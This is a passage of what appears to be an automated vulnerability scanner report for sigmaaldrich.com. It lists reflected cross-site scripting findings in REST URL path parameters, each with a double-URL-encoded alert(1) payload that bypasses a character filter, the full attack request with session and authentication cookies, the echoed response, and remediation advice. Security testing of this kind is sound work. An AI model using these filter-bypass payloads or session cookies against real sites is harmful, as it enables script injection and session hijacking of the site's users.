Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:46 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc3998f";alert(1)//fed13c53a9e/medialib/life-science/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.404. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aff%2522%253balert%25281%2529%252f%252fd5019ee4549 was submitted in the REST URL parameter 2. This input was echoed as 20aff";alert(1)//d5019ee4549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib20aff%2522%253balert%25281%2529%252f%252fd5019ee4549/life-science/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:48 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib20aff";alert(1)//d5019ee4549/life-science/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.405. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71067%2522%253balert%25281%2529%252f%252ff0ecb1fa8d was submitted in the REST URL parameter 3. This input was echoed as 71067";alert(1)//f0ecb1fa8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science71067%2522%253balert%25281%2529%252f%252ff0ecb1fa8d/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science71067";alert(1)//f0ecb1fa8d/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.406. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f1d%2522%253balert%25281%2529%252f%252fe05caf466f4 was submitted in the REST URL parameter 4. This input was echoed as 25f1d";alert(1)//e05caf466f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science/yfg-detail-page-jpg25f1d%2522%253balert%25281%2529%252f%252fe05caf466f4/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:54 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science/yfg-detail-page-jpg25f1d";alert(1)//e05caf466f4/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.407. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11a9%2522%253balert%25281%2529%252f%252f1ccf2ab8e8e was submitted in the REST URL parameter 5. This input was echoed as e11a9";alert(1)//1ccf2ab8e8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-newe11a9%2522%253balert%25281%2529%252f%252f1ccf2ab8e8e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:00 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-newe11a9";alert(1)//1ccf2ab8e8e","E404") ;
   </script>
...[SNIP]...

1.408. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a310%2522%253balert%25281%2529%252f%252ff26cf6c70bc was submitted in the REST URL parameter 1. This input was echoed as 6a310";alert(1)//f26cf6c70bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc6a310%2522%253balert%25281%2529%252f%252ff26cf6c70bc/medialib/logos/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
